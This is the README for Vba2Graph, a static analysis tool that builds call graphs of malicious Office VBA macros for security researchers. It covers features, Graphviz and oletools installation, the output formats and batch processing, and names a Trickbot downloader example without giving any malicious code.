Vba2Graph: Generate call graphs from VBA code
Vba2Graph
A tool for security researchers, who waste their time analyzing malicious Office macros.
Generates a VBA call graph, with potential malicious keywords highlighted.
Allows for quick analysis of malicious macros, and easy understanding of the execution flow.
Features
- Keyword highlighting
- VBA Properties support
- External function declaration support
- Tricky macros with “_Change” execution triggers
- Fancy colour schemes!
Pros
✓ Pretty fast
✓ Works well on most malicious macros observed in the wild
Cons
✗ Static (dynamically resolved calls would not be recognized)
Installation
Install oletools:
https://github.com/decalage2/oletools/wiki/Install
Install Python Requirements
pip2 install -r requirements.txt
Install Graphviz
Windows
Install Graphviz msi:
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Add “dot.exe” to PATH env variable or just:
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin
Mac
brew install graphviz
Ubuntu
sudo apt-get install graphviz
Arch
sudo pacman -S graphviz
Usage
Only Python 2 is supported:
Output
You’ll get 4 folders in your output folder:
- png: the actual graph image you are looking for
- svg: same graph image, just in vector graphics
- dot: the dot file which was used to create the graph image
- bas: the VBA functions code that was recognized by the script (for debugging)
Batch Processing
Mac/Linux:
batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs.
Deletes output dir. use with caution.
Example 1:
Trickbot downloader – utilizes object Resize event as an initial trigger, followed by TextBox_Change triggers.
Example 2:
Author: @MalwareCantFly